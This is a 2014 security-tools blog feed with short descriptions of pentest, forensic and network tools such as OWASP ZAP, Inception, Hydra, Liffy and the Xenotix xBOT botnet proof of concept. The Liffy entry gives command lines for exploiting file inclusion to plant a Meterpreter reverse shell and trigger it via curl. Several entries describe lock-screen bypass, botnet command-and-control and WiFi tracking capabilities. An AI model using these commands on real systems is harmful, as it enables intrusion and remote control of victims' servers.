OWASP ZAP v2.3.1 - An easy to use integrated penetration testing tool for finding vulnerabilities in web applications

May 29, 2014, 3:54 pm

≫ Next: Inception - Attacking FireWire Devices

≪ Previous: Parsero v0.75 - Attacking Robots.txt Files

OWASP Zed Attack Proxy (ZAP) An easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing as well as being a useful addition to an experienced pen testers toolbox.

Changelog v2.3.1

The following changes were made in this release:

ZAP changes request data (while switching views) ( Issue 81 )
Unfulfilled dependencies hang the active scan ( Issue 377 )
Cant remove scripts marked as ‘load on start’ ( Issue 1073 )
core.newSession doesn’t clear Sites ( Issue 1114 )
Historical Request Tab Doesn’t allow formatting changes ( Issue 1155 )
Proxy gzip decoder doesn’t update content length in response headers ( Issue 1156 )
Unable to set a home directory with a space on the command line ( Issue 1163 )
Redundant indexes in zapdb.script ( Issue 1166 )
Add proxy support for “deflate” content encoding ( Issue 1168 )
Spider Context/User pop up menus no longer shown ( Issue 1170 )
Unable to select 2 requests in fuzz results (Ctrl + click) ( Issue 1179 )
Vulnerable pages active scanned only once ( Issue 1181 )
Alerts of same type for different parameters of same vulnerable page shown only once in “Alerts” tree ( Issue 1182 )
NullPointerException while selecting a node in the “Alerts” tab after deleting a message ( Issue 1183 )
Cmdline session params have no effect ( Issue 1191 )
Scan URL path elements – turn off by default ( Issue 1193 )
Command line arguments are not passed to extensions when starting ZAP in daemon mode ( Issue 1194 )
AbstractPlugin.bingo incorrectly sets evidence to attack ( Issue 1196 )
Issue with loading addons that did not initialize correctly ( Issue 1202 )
WordPress Authentication Script ( Issue 1203 )
‘History’ tab is not cleared when a new session is created through the API with ZAP in GUI mode ( Issue 1206 )

Download OWASP ZAP v2.3.1

↧

Inception - Attacking FireWire Devices

May 30, 2014, 11:05 am

≫ Next: Volafox - Mac OS X & BSD Memory Analysis Toolkit

≪ Previous: OWASP ZAP v2.3.1 - An easy to use integrated penetration testing tool for finding vulnerabilities in web applications

Inception is a FireWire physical memory manipulation and hacking tool exploiting IEEE 1394 SBP-2 DMA. The tool can unlock (any password accepted) and escalate privileges to Administrator/root on almost* any powered on machine you have physical access to. The tool can attack over FireWire, Thunderbolt, ExpressCard, PC Card and any other PCI/PCIe interfaces.

Inception aims to provide a stable and easy way of performing intrusive and non-intrusive memory hacks in order to unlock live computers using FireWire SBP-2 DMA. It it primarily attended to do its magic against computers that utilize full disk encryption such as BitLocker, FileVault, TrueCrypt or Pointsec. There are plenty of other (and better) ways to hack a machine that doesn't pack encryption.

As of version 0.3.5, it is able to unlock the following x86 and x64 operating systems:

OS	Version	Unlock lock screen	Escalate privileges	Dump memory < 4 GiB
Windows 8	8.1	Yes	Yes	Yes
Windows 8	8.0	Yes	Yes	Yes
Windows 7	SP1	Yes	Yes	Yes
Windows 7	SP0	Yes	Yes	Yes
Windows Vista	SP2	Yes	Yes	Yes
Windows Vista	SP1	Yes	Yes	Yes
Windows Vista	SP0	Yes	Yes	Yes
Windows XP	SP3	Yes	Yes	Yes
Windows XP	SP2	Yes	Yes	Yes
Windows XP	SP1			Yes
Windows XP	SP0			Yes
Mac OS X	Mavericks	Yes (1)	Yes (1)	Yes (1)
Mac OS X	Mountain Lion	Yes (1)	Yes (1)	Yes (1)
Mac OS X	Lion	Yes (1)	Yes (1)	Yes (1)
Mac OS X	Snow Leopard	Yes	Yes	Yes
Mac OS X	Leopard			Yes
Ubuntu (2)	Saucy	Yes	Yes	Yes
Ubuntu	Raring	Yes	Yes	Yes
Ubuntu	Quantal	Yes	Yes	Yes
Ubuntu	Precise	Yes	Yes	Yes
Ubuntu	Oneiric	Yes	Yes	Yes
Ubuntu	Natty	Yes	Yes	Yes
Ubuntu	Maverick	Yes (3)	Yes (3)	Yes
Ubuntu	Lucid	Yes (3)	Yes (3)	Yes
Linux Mint	13	Yes	Yes	Yes
Linux Mint	12	Yes	Yes	Yes
Linux Mint	12	Yes	Yes	Yes

(1): If FileVault 2 is enabled, the tool will only work when the operating system is unlocked. (2): Other Linux distributions that use PAM-based authentication may also work using the Ubuntu signatures. (3): x86 only.

The tool also effectively enables escalation of privileges, for instance via the runas or sudo -s commands, respectively. More signatures will be added. The tool makes use of the libforensic1394 library courtesy of Freddie Witherden under a LGPL license.

Download Inception

↧

Volafox - Mac OS X & BSD Memory Analysis Toolkit

May 30, 2014, 11:07 am

≫ Next: RedoWalker - Tool to explore Oracle database transaction logs

≪ Previous: Inception - Attacking FireWire Devices

Volafox is an open source toolkit that you can use for Mac OS X and BSD forensics. The tool is a python based and allows investigating security incidents and finding information for malwares and any malicious program on the system. Security analyst can have the following information using this tool:

Information

Kernel version, CPU and memory spec, boot/sleep/wakeup time
Mounted filesystems
Process listing and dump address space
KEXT(Kernel Extensions) listing
System Call / Mach Trap Table (Hooking Detection)
Network socket listing
Open files listing by process
PE State information ( Device Tree, Video Memory Area)
EFI information ( EFI System Table, EFI Configuration Table, EFI Runtime Services)
extract keychain master key candidates
TrustedBSD analysis
other command : uname, dmesg ... etc

Download Volafox

↧

RedoWalker - Tool to explore Oracle database transaction logs

May 31, 2014, 12:31 pm

≫ Next: HTTPNetworkSniffer - Http Sniffer Utility

≪ Previous: Volafox - Mac OS X & BSD Memory Analysis Toolkit

RedoWalkeris a tool to explore Oracle database transaction logs, otherwise known as redo logs. Any time changes are made to the database server, for example after an INSERT, DELETE or UPDATE, they are recorded in the redo log.

These redo logs are stored in a proprietary and undocumented format and, as such, are unreadable and unintelligible without a tool that can decipher them. Oracle does provide a tool called LogMiner to access the redo logs but to use it access to a live database server is required. RedoWalker is a replacement for LogMiner and removes this requirement. This is particularly useful for auditors, forensic examiners and breach investigators. DBAs can also take advantage of RedoWalker for troubleshooting and problem isolation without the database server; using LogMiner could cause the database server to slow down.

RedoWalker dumps Oracle redo logs to an XML format; it specifically dumps redo entries fro DDL, INSERTs, UPDATEs, DELETEs and associated UNDO records.

System Requirements

RedoWalker runs on Windows and requires the .Net Framework.
Should work with Oracle 10g, 11g and 12c.

Download RedoWalker

↧

HTTPNetworkSniffer - Http Sniffer Utility

May 31, 2014, 12:34 pm

≫ Next: Argus v3.0.6 - Real Time Auditing Network Activity

≪ Previous: RedoWalker - Tool to explore Oracle database transaction logs

HTTPNetworkSniffer is a packet sniffer tool that captures all HTTP requests/responses sent between the Web browser and the Web server and displays them in a simple table. For every HTTP request, the following information is displayed: Host Name, HTTP method (GET, POST, HEAD), URL Path, User Agent, Response Code, Response String, Content Type, Referer, Content Encoding, Transfer Encoding, Server Name, Content Length, Cookie String, and more...

You can easily select one or more HTTP information lines, and then export them to text/html/xml/csv file or copy them to the clipboard and then paste them into Excel.

Download HTTPNetworkSniffer

↧

Argus v3.0.6 - Real Time Auditing Network Activity

June 1, 2014, 11:15 am

≫ Next: WifiInfoView v1.60 - WiFi Scanner for Windows

≪ Previous: HTTPNetworkSniffer - Http Sniffer Utility

Argusis a fixed-model Real Time Flow Monitor designed to track and report on the status and performance of all network transactions seen in a data network traffic stream. Argus provides a common data format for reporting flow metrics such as connectivity, capacity, demand, loss, delay, and jitter on a per transaction basis. The record format that Argus uses is flexible and extensible, supporting generic flow identifiers and metrics, as well as application/protocol specific information.

Argus is composed of an advanced comprehensive network flow data generator, the Argus sensor, which processes packets (either capture files or live packet data) and generates detailed network flow status reports of all the flows in the packet stream. Argus captures much of the packet dynamics and semantics of each flow, with a great deal of data reduction, so you can store, process, inspect and analyze large amounts of network data efficiently. Argus provides reachability, availability, connectivity, duration, rate, load, good-put, loss, jitter, retransmission, and delay metrics for all network flows, and captures most attributes that are available from the packet contents, such as L2 addresses, tunnel identifiers (MPLS, GRE, ESP, etc…), protocol ids, SAP’s, hop-count, options, L4 transport identification (RTP, RTCP detection), host flow control indications, etc.

Argus is used by many sites to generate network activity reports for every network transaction on their networks. The network audit data that Argus generates is great for security, operations and performance management. The data is used for network forensics, non-repudiation, network asset and service inventory, behavioral baselining of server and client relationships, detecting covert channels, and analyzing Zero day events.

Argus is an Open Source project, currently running on Mac OS X, Linux, Solaris, FreeBSD, OpenBSD, NetBSD, AIX, IRIX, Windows (under Cygwin) and OpenWrt, and has been ported to many hardware accelerated platforms, such as Bivio, Pluribus, Arista, and Tilera. The software should be portable to many other environments with littleor no modifications. Performance is such that auditing an entire enterprise’s Internet activity can be accomplished using modest computing resources.

Download Argus

↧

WifiInfoView v1.60 - WiFi Scanner for Windows

June 1, 2014, 11:25 am

≫ Next: Bradamsa - Burp Suite extension to generate Intruder payloads using Radamsa

≪ Previous: Argus v3.0.6 - Real Time Auditing Network Activity

WifiInfoView scans the wireless networks in your area and displays extensive information about them, including: Network Name (SSID), MAC Address, PHY Type (802.11g or 802.11n), RSSI, Signal Quality, Frequency, Channel Number, Maximum Speed, Company Name, Router Model and Router Name (Only for routers that provides this information), and more...

When you select a wireless network in the upper pane of this tool, the lower pane displays the Wi-Fi information elements received from this device, in hexadecimal format.

WifiInfoView also has a summary mode, which displays a summary of all detected wireless networks, grouped by channel number, company that manufactured the router, PHY type, or the maximum speed.

Download WifiInfoView v1.60

↧

Bradamsa - Burp Suite extension to generate Intruder payloads using Radamsa

June 2, 2014, 11:29 am

≫ Next: Liffy - Local File Inclusion Exploitation Tool

≪ Previous: WifiInfoView v1.60 - WiFi Scanner for Windows

Bradamsa is a Burp Suite extension for Radamsa, a well-known fuzzer made by the Oulu University Secure Programming Group. Inspired by burp-radamsa, this plugin allows to generate Intruder payloads using Radamsa.

Features

Java-based plugin using native Burp Suite extension APIs
Intruder payloads generator using Radamsa (sniper attack type only)
Support for Radamsa v0.3 options
Options validation directly from within Burp Suite

Download Bradamsa

↧

Liffy - Local File Inclusion Exploitation Tool

June 2, 2014, 1:52 pm

≫ Next: Simple SQLi Dumper v5.1 - Tool to find bugs, errors or vulnerabilities in MySQL database

≪ Previous: Bradamsa - Burp Suite extension to generate Intruder payloads using Radamsa

Liffy is a tool written in Python designed to exploit local file inclusion vulnerabilities using three different techniques that will get you a working web shell. The first two make use of the built-in PHP wrappers php://input and data://. The third makes use of the process control extension called 'expect'.

For those unfamiliar I've included some links that highlight the usage of these techniques in LFI exploitation.

Exploitation

Once you have found an local file inclusion vulnerability, you simply point liffy at its location and select which technique you want to use.

./liffy --url http://target/vuln/file.php?= --data

The tool will create a PHP Meterpreter payload using msfpayload and drop it into your /tmp directory. It will then attempt to use the PHP wrapper to download the generated shell which you should have hosted by either using Node or Python's HTTP web servers.

http-server /tmp -p 8000

If all this works you should see a GET request to your shell, which is then downloaded to the working directory on the target webserver. From there a Metasploit resource file is created for you to spawn up a listening handler for inbound connections from the reverse PHP Meterpreter.

msfconsole -r php_listener.rc

Now you simply curl the location of your webshell and you should get see a new Meterpreter session spawn

curl --silent http://target/vuln/7ka0tqsq.php

Download Liffy

↧

Simple SQLi Dumper v5.1 - Tool to find bugs, errors or vulnerabilities in MySQL database

June 3, 2014, 12:12 pm

≫ Next: Bro - Passive Open-Source Network Traffic Analyzer

≪ Previous: Liffy - Local File Inclusion Exploitation Tool

SSDp is an usefull penetration tool to find bugs, errors or vulnerabilities in MySQL database.

Functions

SQL Injection
Operation System Function
Dump Database
Extract Database Schema
Search Columns Name
Read File (read only)
Create File (read only)
Brute Table & Column

Download Simple SQLi Dumper v5.1

↧

Bro - Passive Open-Source Network Traffic Analyzer

June 3, 2014, 1:34 pm

≫ Next: Hydra Network Logon Cracker 8.0 - Very fast network logon cracker which support many different services

≪ Previous: Simple SQLi Dumper v5.1 - Tool to find bugs, errors or vulnerabilities in MySQL database

While focusing on network security monitoring, Bro provides a comprehensive platform for more general network traffic analysis as well. Well grounded in more than 15 years of research, Bro has successfully bridged the traditional gap between academia and operations since its inception. Today, it is relied upon operationally in particular by many scientific environments for securing their cyberinfrastructure. Bro’s user community includes major universities, research labs, supercomputing centers, and open-science communities.

Bro is a passive, open-source network traffic analyzer. It is primarily a security monitor that inspects all traffic on a link in depth for signs of suspicious activity. More generally, however, Bro supports a wide range of traffic analysis tasks even outside of the security domain, including performance measurements and helping with trouble-shooting.

Features

Deployment

Runs on commodity hardware on standard UNIX-style systems (including Linux, FreeBSD, and MacOS).
Fully passive traffic analysis off a network tap or monitoring port.
Standard libpcap interface for capturing packets.
Real-time and offline analysis.
Cluster-support for large-scale deployments.
Unified management framework for operating both standalone and cluster setups.
Open-source under a BSD license.

Analysis

Comprehensive logging of activity for offline analysis and forensics.
Port-independent analysis of application-layer protocols.
Support for many application-layer protocols (including DNS, FTP, HTTP, IRC, SMTP, SSH, SSL).
Analysis of file content exchanged over application-layer protocols, including MD5/SHA1 computation for fingerprinting.
Comprehensive IPv6 support.
Tunnel detection and analysis (including Ayiya, Teredo, GTPv1). Bro decapsulates the tunnels and then proceeds to analyze their content as if no tunnel was in place.
Extensive sanity checks during protocol analysis.
Support for IDS-style pattern matching.

Scripting Language

Turing-complete language for expression arbitrary analysis tasks.
Event-based programming model.
Domain-specific data types such as IP addresses (transparently handling both IPv4 and IPv6), port numbers, and timers.
Extensive support for tracking and managing network state over time.

Interfacing

Default output to well-structured ASCII logs.
Alternative backends for ElasticSearch and DataSeries. Further database interfaces in preparation.
Real-time integration of external input into analyses. Live database input in preparation.
External C library for exchanging Bro events with external programs. Comes with Perl, Python, and Ruby bindings.
Ability to trigger arbitrary external processes from within the scripting language.

Download Bro

↧

Hydra Network Logon Cracker 8.0 - Very fast network logon cracker which support many different services

June 3, 2014, 7:52 pm

≫ Next: RCEer - Simple Remote Command Execution scanner

≪ Previous: Bro - Passive Open-Source Network Traffic Analyzer

A very fast network logon cracker which support many different services.

See feature sets and services coverage page - incl. a speed comparison against ncrack and medusa.Number one of the biggest security holes are passwords, as every password security study shows.

This tool is a proof of concept code, to give researchers and security consultants the possiblity to show how easy it would be to gain unauthorized access from remote to a system.

There are already several login hacker tools available, however none does either support more than one protocol to attack or support parallized connects.

It was tested to compile cleanly on Linux, Windows/Cygwin, Solaris, FreeBSD/OpenBSD, QNX (Blackberry 10) and OSX.

Currently this tool supports the following protocols:

Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

Changelog for hydra
-------------------

Release 8.0
! Development moved to a public github repository: https://github.com/vanhauser-thc/thc-hydra
* Added module for redis (submitted by Alejandro Ramos, thanks!)
* Added patch which adds Unicode support for the SMB module (thanks to Max Kosmach)
* Added initial interactive password authentication test for ssh (thanks to Joshua Houghton)
* Added patch for xhydra that adds bruteforce generator to the GUI (thanks to Petar Kaleychev)
* Target on the command line can now be a CIDR definition, e.g. 192.168.0.0/24
* with -M , you can now specify a port for each entry (use "target:port" per line)
* Verified that hydra compiles cleanly on QNX / Blackberry 10 :-)
* Bugfixes for -x option:
  - password tries were lost when connection errors happened (thanks to Vineet Kumar for reporting)
  - fixed crash when used together with -e option 
* Fixed a bug that hydra would not compile without libssh (introduced in v7.6)
* Various bugfixes if many targets where attacked in parallel
* Cygwin's Postgresql is working again, hence configure detection re-enabled
* Added gcc compilation security options (if detected to be supported by configure script)
* Enhancements to the secure compilation options
* Checked code with cppcheck and fixed some minor issues.
* Checked code with Coverity. Fixed a lot of small and medium issues.

Download Hydra Network Logon Cracker 8.0

↧

RCEer - Simple Remote Command Execution scanner

June 4, 2014, 12:18 pm

≫ Next: Webfwlog - Firewall Log Analyzer

≪ Previous: Hydra Network Logon Cracker 8.0 - Very fast network logon cracker which support many different services

Simple Remote Command Execution scanner written in Python 2.7

Download RCEer

↧

Webfwlog - Firewall Log Analyzer

June 4, 2014, 12:55 pm

≫ Next: WebCookiesSniffer - Capture Web site cookies

≪ Previous: RCEer - Simple Remote Command Execution scanner

Webfwlogis a flexible web-based firewall log analyzer and reporting tool. It supports standard system logs for linux, FreeBSD, OpenBSD, NetBSD, Solaris, Irix, OS X, etc. as well as Windows XP®. Supported log file formats are netfilter, ipfilter, ipfw, ipchains and Windows XP®. Webfwlog also supports logs saved in a database using the ULOG or NFLOG targets of the linux netfilter project, or any other database logs mapped with a view to the ulogd schema. Versions 1 and 2 of ulogd database schemas are supported. Webfwlog is licensed under the GNU GPL.

Webfwlog fully supports IPv6 for database logs, and netfilter and ipfilter system logs.

With Webfwlog you can design reports to use on your logged data in whatever configuration you desire. Included are example reports as a starting point. You can sort a report with a single click, “drill-down” on the reports all the way to the packet level, and save your reports for later use.

Prerequisites:

A web server with PHP >= 4.1
Log files in standard netfilter, ipfilter, ipfw, ipchains or Windows XP® format or database logs populated with the ULOG or NFLOG target of netfilter, or other database logs mapped with a view to ulogd version 1 or 2 schemas
A MySQL or PostgreSQL database server:
MySQL >= 3.23.52 or any production release of 4.x or 5.x
MySQL >= 5 required for IPv6
PostgreSQL >= 7.1
PostgreSQL >= 7.4 required for IPv6
Your favorite web browser.

Changelog v1.0

Add support for ulogd version 2.
Add support for snort database logs.
Add support for Cisco IOS and Cisco PIX log formats (syslog).
Add support for snort log files (syslog).
Add support for netscreen log files (syslog).
Add support for multiple table/view selection (database).
Add IPv6 support for database logs, netfilter and ipfilter.
Add support for RFC 5424 dates in netfilter log files.
Add ip protocol number / name in ip headers section on packet detail page.
Accept numeric criteria in binary notation (0b10010100)
Output numeric fields in configurable format (decimal, hex, octal, binary).
Substantial performance improvement with database logs.
Only print fields on packet detail page where data exists.
Only populate cache for fields appearing in report.
Add option to populate cache for fields even when not in report.
Work natively with postgresql inet column type.
Implement php mysqli interface and use it when present.
Test icmp_gateway column type separately from ip_saddr (database).
For protocol-specific criteria/match, only check/display when relevant.
Always use oob_time_sec when local_time does not exist (database).
Add config parameter to set timezone if not set in php.ini (PHP >= 5.1).
Sort blank source and destination port last for syslog (to match database).
Fix matching by tcp options when not exact match (syslog).
Fix parsing of ipfilter icmp code names.
Fix display of service names to ‘-’ when name doesn’t resolve(database logs).
Fix state maintenance when using alternate data source.
Fix display of oob time to use date format string (database).
Fix display of icmp gateway on packet detail page.
Fix mysql and postgresql setup scripts for sample reports on some systems.
Fix drill-down with arbitrary column defined in some cases (database).
Fix page refresh when running report from report editor.
Fix harmless PHP notice-level messages about undefined indexes, etc.
Fix for netfilter when kernel logs uptime (syslog).
Fix for Cisco PIX ID string variations.
Gracefully continue on home page/report editor if no log table or view found.
Remove outmoded option to update all in cache (database).
Do not require or allow “AND” at start of additional WHERE clause (database).
Use pcre instead of deprecated ereg functions internally.
Allow trailing comments in conf file.
Build system: use automake
HTML fixes.
Fix compiler warnings.
Code cleanup.
Documentation updates.

Download Webfwlog

↧

WebCookiesSniffer - Capture Web site cookies

June 5, 2014, 11:15 am

≫ Next: ByWaf - Web Application Penetration Testing Framework

≪ Previous: Webfwlog - Firewall Log Analyzer

WebCookiesSniffer is a packet sniffer tool that captures all Web site cookies sent between the Web browser and the Web server and displays them in a simple cookies table. The upper pane of WebCookiesSniffer displays the cookie string and the Web site/host name that sent or received this cookie. When selecting a cookie string in the upper pane, WebCookiesSniffer parses the cookie string and displays the cookies as name-value format in the lower pane.

Download WebCookiesSniffer

↧

ByWaf - Web Application Penetration Testing Framework

June 5, 2014, 12:57 pm

≫ Next: Bing Heartbleed Scan - Tool to extract sites from a bing search and check if are vulnerables

≪ Previous: WebCookiesSniffer - Capture Web site cookies

ByWafis a Web Application Penetration Testing Framework (WAPTF). It consists of a command-line interpreter and a set of plugins. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License.

The Bywaf application is built on Python’s built-in cmd.Cmd class. Cmd is a lightweight command interpreter loop that provides several useful facilities for the developer, including overridable hook methods and easy addition of commands and help. For the user, it offers commandline editing with readline, including automatic tab completion of commands, command options and filenames.

Bywaf contains a sub-classed version of Cmd called Wafterpreter, which adds some important additions, including:

Loading and selecting plugins.
Getting and setting global and per-plugin options.
Additional methods exposing functionality to the plugins.
Backgrounding jobs, ending running jobs and querying job status.
Loading scripts from the the command-line or within the interpreter.
Loading, saving, showing and clearing the command history.

Wafterpreter API and utility methods:

The Wafterpreter API encompasses methods used by both the plugins as well as the Wafterpreter’s own methods; this allows for plugins to refining its behavior by assigning their own methods in their place.

Utility methods are time-saving shortcuts; while the API methods are the preferred way to change the interpreter’s behavior and to perform queries for jobs.

filename_completer(): a utility method and API that when given a set of starting and ending indices of the current word under the command-line cursor, returns the available filenames the word matches. This parameters to this method are supplied to completion methods, which can in turn pass them to this method.
get_job(): this utility method retrieves a Futures instace from the Wafterpreter’s internal list of completed and running jobs, given its job ID. This is useful in querying information about individual jobs (see do_kill() for an example).
finished_job_callback(): This overridable method is called upon the completion of a backgrounded job. It is used by the onecmd() method to notify the user when a backgrounded job has finished.
set_prompt(): an API method for setting the prompt to reflect a new plugin name.
get_history_item(): an API method returning the command history.
save_history(): an API method for saving the command history to a file.
load_history(): an API method for loading the command history from a file.
clear_history(): an API method for clearing the command history.
load_module(): a private low-level method for loading modules. Gets called by do_use(). There should not be a reason for its use outside that method.

Download ByWaf

↧

Bing Heartbleed Scan - Tool to extract sites from a bing search and check if are vulnerables

June 5, 2014, 2:58 pm

≫ Next: sb0x-project - A simple and Lightweight framework for Penetration testing

≪ Previous: ByWaf - Web Application Penetration Testing Framework

A simple scan in bash to extract sites from a bing search and check if is vulnerable.

Download Bing Heartbleed Scan

↧

sb0x-project - A simple and Lightweight framework for Penetration testing

June 6, 2014, 11:45 am

≫ Next: Snoopy - A distributed tracking and data interception framework

≪ Previous: Bing Heartbleed Scan - Tool to extract sites from a bing search and check if are vulnerables

sb0x-project is A Lightweight Framework for PenTesting Written in Python

Platforms:

Linux
BSD
"Or Unix System"

Download sb0x

↧

Snoopy - A distributed tracking and data interception framework

June 9, 2014, 6:26 am

≫ Next: Xenotix xBOT - A Cross Platform PoC Bot that abuse certain Google Services to implement it's C&C

≪ Previous: sb0x-project - A simple and Lightweight framework for Penetration testing

Snoopy is a distributed tracking and profiling framework which can perform interesting tracking and profiling of mobile users through the use of WiFi.

There have been recent initiatives from numerous governments to legalise the monitoring of citizens’ Internet based communications (web sites visited, emails, social media) under the guise of anti-terrorism.

Several private organisations have developed technologies claiming to facilitate the analysis of collected data with the goal of identifying undesirable activities. Whether such technologies are used to identify such activities, or rather to profile all citizens, is open to debate. Budgets, technical resources, and PhD level staff are plentiful in this sphere. This inspired the goal of the Snoopy project: with the limited time and resources of a few technical minds could we create our own distributed tracking and data interception framework with functionality for simple analysis of collected data.

Snoopy consists of four components:

Client software (aka Snoopy Drone software)
Server software
Web interface
Maltego transforms

Plug-ins

Plug-ins consist of two parts:

Back-end (data providing) part, written in Python
Front-end (displaying) part, written in JavaScript (optional)

Requirements

Ubuntu 12.04 LTS 32bit online server
One or more Linux based client devices with internet connectivity and a WiFi device supporting injection drivers. We’d recommend the Nokia N900.
A copy of Maltego Radium

Web Interface: You can access the web interface via http://yoursnoopyserver:5000/. You can write your own data exploration plugins. Check the Appendix of the README file for more info on that.

Download Snoopy

↧

Xenotix xBOT - A Cross Platform PoC Bot that abuse certain Google Services to implement it's C&C

June 9, 2014, 6:31 am

≫ Next: OWASP Mantra Security Toolkit - Browser Based Security Framework

≪ Previous: Snoopy - A distributed tracking and data interception framework

Xenotix xBOT is a proof of concept cross platform (Linux, Windows, Mac) bot written in Python that abuse certain Google Services to implement Command & Control Center for the botnet. The Google Apps Data API, Google Forms and Google Spreadsheet is abused to implement C2 for a bot network. The Google Forms can act as the C2 for a bot network. All the entries to the Google Form are send to an attached Spreadsheet. Here we can implement a bot that will listen to the Google Data API URL and extract the commands and later send back the response via the same Form. The Google Data API allows us to fetch the contents of a published spreadsheet in a variety of formats. The spreadsheet feeds are fetched in RSS format and will parsed. For implementing the bot we will parse through the source, fetch the commands and do the corresponding operations. xBOT’s communication is encrypted as it uses Google’s own SSL connection and is nowhere affected by any firewalls as it works at Application layer. The botnet’s commands and responses are encrypted with SSL from Google Itself making it harder to sniff the bot’s communications in the network. It is a prototype bot with the bare minimum features of a Typical Bot. The intention of this tool is to give an idea about how Google API’s can be abused for Botnet Implementation.

xBOT COMMANDS

xSYSINFO : Get System Information
EXECUTE : Execute a passive system command
xDOWNLOAD : Download a file from an URL
xUPLOAD : Upload a file
xNETWORK : Get network information
xPORTSCAN : Run a Portscan
xSCREENSHOT : Grab a Screenshot
xKILL : Kill and Remove the xBOT.

Download Xenotix xBOT

↧